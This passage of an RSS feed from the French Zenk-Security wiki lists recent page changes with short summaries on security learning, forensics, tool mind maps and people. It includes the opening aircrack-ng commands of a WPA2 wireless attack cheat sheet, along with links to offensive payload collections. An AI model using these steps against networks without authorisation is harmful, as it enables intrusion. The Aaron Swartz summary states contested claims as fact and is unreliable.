                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=raspberry_pi&amp;rev=1576987687&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level1&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level10&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level2&amp;rev=1434909115&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level3&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level4&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level5&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level6&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level7&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level8&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=redtiger_level9&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=reseaux_sociaux&amp;rev=1585692236&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=reverse_engineering&amp;rev=1553091543&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=richard_stallman&amp;rev=1517075776&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=rtfm&amp;rev=1517074179&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ruby&amp;rev=1572001144&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ruby_on_rails&amp;rev=1572001127&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=rue&amp;rev=1516583291&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=samba_exploit&amp;rev=1601326762&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=scala&amp;rev=1572001159&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=sciences_participatives&amp;rev=1615114294&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=scoreboard&amp;rev=1697807778&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=script_kiddie&amp;rev=1509839211&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=securite_web&amp;rev=1340798199&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=series_tv&amp;rev=1612039061&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=series_tv_anime&amp;rev=1528702308&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=shell&amp;rev=1577819754&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=shitposting&amp;rev=1517102572&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=sjw&amp;rev=1517094724&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=sommaire&amp;rev=1435432415&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=sourceforge&amp;rev=1517096369&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=sqlmap_usage&amp;rev=1572041887&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ssh&amp;rev=1509814395&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ssh_configuration&amp;rev=1535359090&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=stay_alive&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=stripe_ctf&amp;rev=1346268283&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=suppression_de_logiciel_malveillant_windows&amp;rev=1509794410&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=techniques_de_nettoyage&amp;rev=1509793309&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=telechargement_et_installation_d_un_logiciel_de_virtualisation_virtualbox&amp;rev=1371197692&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=temple_os&amp;rev=1516583864&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=terry_davis&amp;rev=1557666581&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=trouver_des_exploits_publique&amp;rev=1715950434&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ubuntu&amp;rev=1509842142&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=une_liste_de_site_qui_font_des_audits_web_gratuitement&amp;rev=1589368207&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=unicode_comme_canal_steganographique&amp;rev=1394896690&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=vbs_script&amp;rev=1572001177&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=wiki_communautaire&amp;rev=1734533650&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=windows&amp;rev=1565425739&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=windows_10&amp;rev=1509842709&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=windows_7&amp;rev=1509842945&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=writeups&amp;rev=1690468966&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=wysiwyg&amp;rev=1516572834&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=xss_reports&amp;rev=1593583790&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=youtube&amp;rev=1552318118&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=yubikey_4_chiffrer_signer_ssh_github_tuto&amp;rev=1572352675&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=zenk_roulettes&amp;rev=1405974176&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=zeronet&amp;rev=1531604810&amp;do=diff"/>
            </rdf:Seq>
        </items>
    </channel>
    <image rdf:about="http://wiki.zenk-security.com/lib/tpl/dokuwiki/images/favicon.ico">
        <title>Zenk - Security</title>
        <link>http://wiki.zenk-security.com/</link>
        <url>http://wiki.zenk-security.com/lib/tpl/dokuwiki/images/favicon.ico</url>
    </image>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=29c3&amp;rev=1356869338&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-12-30T13:08:58+02:00</dc:date>
        <title>29c3</title>
        <link>http://wiki.zenk-security.com/doku.php?id=29c3&amp;rev=1356869338&amp;do=diff</link>
        <description>Web

regexdb 100 pts

Exploitation

minesweeper 100 pts

Misc

JSUX 100 pts</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=aaron_swartz&amp;rev=1516573899&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-21T23:31:39+02:00</dc:date>
        <title>aaron_swartz</title>
        <link>http://wiki.zenk-security.com/doku.php?id=aaron_swartz&amp;rev=1516573899&amp;do=diff</link>
        <description>Aaron Swartz a co-créé Creative Commons à l'âge de 12 ans, RSS à l'âge de 13 ans, Reddit à l'âge de 15 ans, et l'une des principales raisons pour lesquelles SOPA n'a pas réussi. Il s'est suicidé en 2013 en raison de la surveillance illégale du gouvernement sur lui-même, ainsi que d'un certain nombre d'accusations inventées.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=active_directory&amp;rev=1669207311&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-11-23T13:41:51+02:00</dc:date>
        <title>active_directory</title>
        <link>http://wiki.zenk-security.com/doku.php?id=active_directory&amp;rev=1669207311&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

intro

Le problème est que la plus part des Active Directory ont été mis en place vers  2005  et  ils n'ont pas été conçu pour les menaces d'aujourd'hui.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ada_lovelace&amp;rev=1517073307&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-27T18:15:07+02:00</dc:date>
        <title>ada_lovelace</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ada_lovelace&amp;rev=1517073307&amp;do=diff</link>
        <description>[Ada Lovelace (1840).]

Ada Lovelace, de son nom complet Augusta Ada King, comtesse de Lovelace, née Ada Byron le 10 décembre 1815 à Londres et morte le 27 novembre 1852 à Marylebone dans la même ville, est une pionnière de la science informatique. Elle est principalement connue pour avoir réalisé le premier programme informatique, lors de son travail sur un ancêtre de l'ordinateur : la machine analytique de Charles Babbage.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=alsa&amp;rev=1509829165&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T21:59:25+02:00</dc:date>
        <title>alsa</title>
        <link>http://wiki.zenk-security.com/doku.php?id=alsa&amp;rev=1509829165&amp;do=diff</link>
        <description>Advanced Linux Sound Architecture, (abr. ALSA), est le système audio par défaut pour la plupart, sinon toutes les distributions GNU/LINUX. ALSA a remplacé Open Sound System (OSS) après la publication d'une nouvelle version d'OSS sous une licence non libre.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=analyse_basique_des_malwares&amp;rev=1371204381&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-06-14T12:06:21+02:00</dc:date>
        <title>analyse_basique_des_malwares</title>
        <link>http://wiki.zenk-security.com/doku.php?id=analyse_basique_des_malwares&amp;rev=1371204381&amp;do=diff</link>
        <description>Ce qui suit est une traduction des cours se trouvant ici : &lt;http://www.dev-point.com/vb/f266/&gt; qui ont été rédigé par !Hacker Rafah! et αzσσz єЈяαм .

	*  Téléchargement et installation d'un logiciel de virtualisation : VirtualBox
	*  Installation de Windows Xp et des additions invités sous VirtualBox
	*  Installation Shadow Defender
	*  Installation d'un chiffreur de clavier KeyScrambler
	*  Outils nécessaires à l'analyse des Malwares</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=analyse_copie&amp;rev=1397507866&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-04-14T22:37:46+02:00</dc:date>
        <title>analyse_copie</title>
        <link>http://wiki.zenk-security.com/doku.php?id=analyse_copie&amp;rev=1397507866&amp;do=diff</link>
        <description>manuelle

Précédemment, nous avons obtenu une image du support fourni grâce aux différentes méthodes de copie. De plus, nous nous sommes assurés (autant que l'on puisse le faire) de l'intégrité du process de copie. Il reste maintenant à analyser l'image.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=analyse_d_un_disque_dur_de_donnees&amp;rev=1649280564&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-04-06T23:29:24+02:00</dc:date>
        <title>analyse_d_un_disque_dur_de_donnees</title>
        <link>http://wiki.zenk-security.com/doku.php?id=analyse_d_un_disque_dur_de_donnees&amp;rev=1649280564&amp;do=diff</link>
        <description>Cette page naît après l'analyse d'un disque dur de 500go comportant des secteurs défectueux. Il est formaté en NTFS et contient juste une partition de données qu'il fallait récupérer bien sûr. Ce disque n'est plus reconnu par windows7. Il propose de le formater pour pouvoir l'utiliser.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=android&amp;rev=1590167105&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-05-22T19:05:05+02:00</dc:date>
        <title>android</title>
        <link>http://wiki.zenk-security.com/doku.php?id=android&amp;rev=1590167105&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

Documentation

🛠 awesome-mobile-security awesome &lt;https://github.com/vaib25vicky/awesome-mobile-security&gt;

🛠 Mobile Application Penetration Testing Cheat Sheet &lt;https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=anonymisation&amp;rev=1526112749&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-05-12T10:12:29+02:00</dc:date>
        <title>anonymisation</title>
        <link>http://wiki.zenk-security.com/doku.php?id=anonymisation&amp;rev=1526112749&amp;do=diff</link>
        <description>L'internet est un endroit cruel et horrible.
Vous voudrez peut-être vous laisser tomber hors de la matrice pour rejoindre un réseau anonyme.
Alternativement, vous pouvez prendre les mesures décrites sur cette page pour réduire au minimum la fouille de données en réduisant votre empreinte en ligne.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=antitrust&amp;rev=1509878404&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T11:40:04+02:00</dc:date>
        <title>antitrust</title>
        <link>http://wiki.zenk-security.com/doku.php?id=antitrust&amp;rev=1509878404&amp;do=diff</link>
        <description>Un procès anti-trust est un procès fédéral aux États-Unis qui fait valoir la tentative d'une entreprise créant un monopole illégal sur leur principal domaine d'activité entravant la libre concurrence.

En France

En France, il n'existe pas de loi antitrust en tant que telle, mais seulement pour les entreprises l'obligation de soumettre un projet de fusion ou de prise de contrôle à autorisation administrative préalable dès lors que cette fusion est susceptible de conduire à une position dominante…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=app_forensic&amp;rev=1340715491&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-06-26T14:58:11+02:00</dc:date>
        <title>app_forensic</title>
        <link>http://wiki.zenk-security.com/doku.php?id=app_forensic&amp;rev=1340715491&amp;do=diff</link>
        <description>Le Forensic (sous entendu Computer Forensic), en français appelé analyse forensique ou plus souvent investigation numérique, est l'art et la technique d'analyser un système mort (ordinateur, téléphone portable ...) dans le but d'en sortir les éléments de preuves.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=app_stegano&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>app_stegano</title>
        <link>http://wiki.zenk-security.com/doku.php?id=app_stegano&amp;rev=1491744837&amp;do=diff</link>
        <description>*  Comprendre le format BMP  Lien -  Lien
	*  Maîtriser les différents principes de stéganographie sur le BMP  Lien -  Lien -  Lien
	*  Voir quels formats de fichier sont les plus exploiter et par quels techniques  Lien
	*  Outils :  Exiv2</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=app_web&amp;rev=1340913718&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-06-28T22:01:58+02:00</dc:date>
        <title>app_web</title>
        <link>http://wiki.zenk-security.com/doku.php?id=app_web&amp;rev=1340913718&amp;do=diff</link>
        <description>*  Apprendre l'HTML et le CSS -&gt; Lien 
	*  Apprendre le Javascript -&gt; Lien 
	*  Apprendre le PHP -&gt; Lien - Lien - Lien 
	*  Savoir à quoi sert le fichier robots.txt et en quoi celui-ci peut être utile dans la collecte d'information -&gt; Lien - Lien 
	*  Comprendre comment fonctionne le vol de sessions -&gt; Lien
	*  Liste numérotéeApprendre à éxploiter les XSS, persistantes et et non persistantes -&gt; Lien - Lien - Lien - Lien - Lien 
	*  Apprendre à exploiter les CSRF -&gt; Lien - Lien 
	*  Apprendre à é…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=apprentissage&amp;rev=1340915151&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-06-28T22:25:51+02:00</dc:date>
        <title>apprentissage</title>
        <link>http://wiki.zenk-security.com/doku.php?id=apprentissage&amp;rev=1340915151&amp;do=diff</link>
        <description>FIXME Si vous commencez une page, pensez à ajouter le lien vers celle-ci dans la catégorie appropriée sur le sommaire ! Merci ! Si vous voulez proposer des liens : &lt;http://forum.zenk-security.com/thread-2804-post-25131.html&gt;

	*  Rétro-Ingénierie
	*  Sécurité Applicative
	*  Sécurité Réseau
	*  Pentest
	*  Cryptologie
	*  Repository &amp; Groupes d'articles
	*  Les choses utiles, voir indispensable à maîtriser</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=archives&amp;rev=1572290623&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-28T20:23:43+02:00</dc:date>
        <title>archives</title>
        <link>http://wiki.zenk-security.com/doku.php?id=archives&amp;rev=1572290623&amp;do=diff</link>
        <description>L'archivage est un concept important. Vous voulez archiver tout ce que vous pouvez pour les générations futures. 

Archives en ligne

	*  Sacred Texts - Archive de textes électroniques sur la religion, la mythologie, les légendes et le folklore, ainsi que sur des thèmes occultes et ésotériques.
	*  Text Files Site web consacré à la préservation des documents numériques émanant de la scène underground des (Bulletin board system) et de diverses autres sous-cultures informatique.
	*  Project Gutenb…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=batteries_externes&amp;rev=1735728747&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-01-01T11:52:27+02:00</dc:date>
        <title>batteries_externes</title>
        <link>http://wiki.zenk-security.com/doku.php?id=batteries_externes&amp;rev=1735728747&amp;do=diff</link>
        <description>Comparatif des protocoles  supporté par nos batteries externes.

Hama Supreme 5HD Powerbank 5000 mAh:

	*  DCP SAM 2A

Vinsic 20 000mAh VSPB206:

	*  DCP SAM 2A

Global Charger Mega Mana 20 000mAh:

	*  QC3.0 5V, 9V, 12V, 3.6-12V (Quick Charge)
	*  FCP 5V, 9V, 12V (Huawei Fast charge)
	*  SCP 3.40-12.00V, 25W (Huawei Super charge)
	*  AFC 5V, 9V, 12V (Samsung Fast charge)
	*  SFCP (Spreadtrum Fast charge)
	*  DCP SAM 2A (Dedicated Charging Port)
	*  Apple 2.4A</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=burpsuite&amp;rev=1592680968&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-06-20T21:22:48+02:00</dc:date>
        <title>burpsuite</title>
        <link>http://wiki.zenk-security.com/doku.php?id=burpsuite&amp;rev=1592680968&amp;do=diff</link>
        <description>Configurer Burpsuite sur Genymotion(emulateur android)</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=c_c&amp;rev=1572000949&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:55:49+02:00</dc:date>
        <title>c_c</title>
        <link>http://wiki.zenk-security.com/doku.php?id=c_c&amp;rev=1572000949&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 [Astrée](&lt;https://www.absint.com/astree/index.htm&gt;) :copyright: - Sound static analyzer based on abstract interpretation for C/C++, detecting memory, type and concurrency defects, and MISRA violations.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=c_sharp&amp;rev=1572000974&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:56:14+02:00</dc:date>
        <title>c_sharp</title>
        <link>http://wiki.zenk-security.com/doku.php?id=c_sharp&amp;rev=1572000974&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 [.NET Analyzers](&lt;https://github.com/DotNetAnalyzers&gt;) - An organization for the development of analyzers (diagnostics and code fixes) using the .NET Compiler Platform.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=carte_-_cheat_sheet_-_des_outils_pour_pentest_active_directory&amp;rev=1669035392&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-11-21T13:56:32+02:00</dc:date>
        <title>carte_-_cheat_sheet_-_des_outils_pour_pentest_active_directory</title>
        <link>http://wiki.zenk-security.com/doku.php?id=carte_-_cheat_sheet_-_des_outils_pour_pentest_active_directory&amp;rev=1669035392&amp;do=diff</link>
        <description>&lt;https://pentestbook.six2dez.com/post-exploitation/windows/ad&gt;

mindmap AD : &lt;https://github.com/Orange-Cyberdefense/ocd-mindmaps/blob/main/img/pentest_ad_dark_2022_11.svg&gt;
&lt;https://tajdini.net/blog/penetration/active-directory-penetration-mind-map/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_d_investigation_numerique&amp;rev=1663061067&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-09-13T11:24:27+02:00</dc:date>
        <title>carte_-_des_outils_d_investigation_numerique</title>
        <link>http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_d_investigation_numerique&amp;rev=1663061067&amp;do=diff</link>
        <description>source : &lt;https://www.amanhardikar.com/mindmaps/Forensics.html&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_en_cryptographie&amp;rev=1663060977&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-09-13T11:22:57+02:00</dc:date>
        <title>carte_-_des_outils_en_cryptographie</title>
        <link>http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_en_cryptographie&amp;rev=1663060977&amp;do=diff</link>
        <description>source : &lt;https://www.amanhardikar.com/mindmaps/Cryptography.html&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_l_audit_de_code&amp;rev=1570619191&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-09T13:06:31+02:00</dc:date>
        <title>carte_-_des_outils_l_audit_de_code</title>
        <link>http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_l_audit_de_code&amp;rev=1570619191&amp;do=diff</link>
        <description>source : &lt;https://www.amanhardikar.com/mindmaps/CodeReview.png&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_browser&amp;rev=1571832100&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-23T14:01:40+02:00</dc:date>
        <title>carte_-_des_outils_pour_browser</title>
        <link>http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_browser&amp;rev=1571832100&amp;do=diff</link>
        <description>source : &lt;https://www.amanhardikar.com/mindmaps/BrowserPlugins.png&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_pentest_active_directory&amp;rev=1662584142&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-09-07T22:55:42+02:00</dc:date>
        <title>carte_-_des_outils_pour_pentest_active_directory</title>
        <link>http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_pentest_active_directory&amp;rev=1662584142&amp;do=diff</link>
        <description>&lt;https://pentestbook.six2dez.com/post-exploitation/windows/ad&gt;

mindmap AD : &lt;https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/pentest_ad.png&gt;

mindmap DACL : &lt;https://pentestbook.six2dez.com/post-exploitation/windows/ad#dacl-mindmap&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_webapp&amp;rev=1571832143&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-23T14:02:23+02:00</dc:date>
        <title>carte_-_des_outils_pour_webapp</title>
        <link>http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_webapp&amp;rev=1571832143&amp;do=diff</link>
        <description>source : &lt;https://www.amanhardikar.com/mindmaps/webapptest.pngl&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_wifi&amp;rev=1570619445&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-09T13:10:45+02:00</dc:date>
        <title>carte_-_des_outils_pour_wifi</title>
        <link>http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_wifi&amp;rev=1570619445&amp;do=diff</link>
        <description>source : &lt;https://www.amanhardikar.com/mindmaps/Wireless.png&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=cheatsheet_wifi&amp;rev=1639054782&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-12-09T13:59:42+02:00</dc:date>
        <title>cheatsheet_wifi</title>
        <link>http://wiki.zenk-security.com/doku.php?id=cheatsheet_wifi&amp;rev=1639054782&amp;do=diff</link>
        <description>Cette page est un fork de &lt;https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/&gt;

WPA2 PSK attack with aircrack-ng suite.

----------

ifconfig wlan1 # check wireless IFace

sudo airmon-ng check kill  # kill issue causing processes

sudo airmon-ng start wlan1 # start monitor mode</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=chiffreur_de_clavier_keyscrambler&amp;rev=1371201279&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-06-14T11:14:39+02:00</dc:date>
        <title>chiffreur_de_clavier_keyscrambler</title>
        <link>http://wiki.zenk-security.com/doku.php?id=chiffreur_de_clavier_keyscrambler&amp;rev=1371201279&amp;do=diff</link>
        <description>KeyScrambler permet de chiffrer tout les données saisies au clavier est ceci dans le but de fournir une protection contre les Keyloggers
Il est disponible en plusieurs version, la version gratuite semble être tout à fait correcte .

Vous pouvez le télécharger depuis le site officiel : &lt;http://www.qfxsoftware.com/download.htm&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=code_scanners&amp;rev=1699609844&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2023-11-10T10:50:44+02:00</dc:date>
        <title>code_scanners</title>
        <link>http://wiki.zenk-security.com/doku.php?id=code_scanners&amp;rev=1699609844&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Semgrep  -  Semgrep accelerates your security journey by swiftly scanning code and package dependencies for known issues, software vulnerabilities, and detected secrets with unparalleled efficiency.
&lt;https://github.com/semgrep/semgrep&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=compilation_de_payloads&amp;rev=1595792441&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-07-26T21:40:41+02:00</dc:date>
        <title>compilation_de_payloads</title>
        <link>http://wiki.zenk-security.com/doku.php?id=compilation_de_payloads&amp;rev=1595792441&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

powershell

🛠 Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security &lt;https://github.com/samratashok/nishang&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=compilation_de_rapports_de_bug_bounty&amp;rev=1604863405&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-11-08T20:23:25+02:00</dc:date>
        <title>compilation_de_rapports_de_bug_bounty</title>
        <link>http://wiki.zenk-security.com/doku.php?id=compilation_de_rapports_de_bug_bounty&amp;rev=1604863405&amp;do=diff</link>
        <description>*  XSS_reports - Compilation de rapport XSS sur hackerone
	*  &lt;https://github.com/juliocesarfort/public-pentesting-reports&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=compilation_de_ressource&amp;rev=1579641682&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-01-21T22:21:22+02:00</dc:date>
        <title>compilation_de_ressource</title>
        <link>http://wiki.zenk-security.com/doku.php?id=compilation_de_ressource&amp;rev=1579641682&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 ☆☆☆ Scanners Box also known as scanbox, is a powerful hacker toolkit, which has collected more than 10 categories of open source scanners from Github, including subdomain, database, middleware and other modular design scanner etc. &lt;https://github.com/We5ter/Scanners-Box&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=compilation_de_ressources_outils_reseau&amp;rev=1587748067&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-04-24T19:07:47+02:00</dc:date>
        <title>compilation_de_ressources_outils_reseau</title>
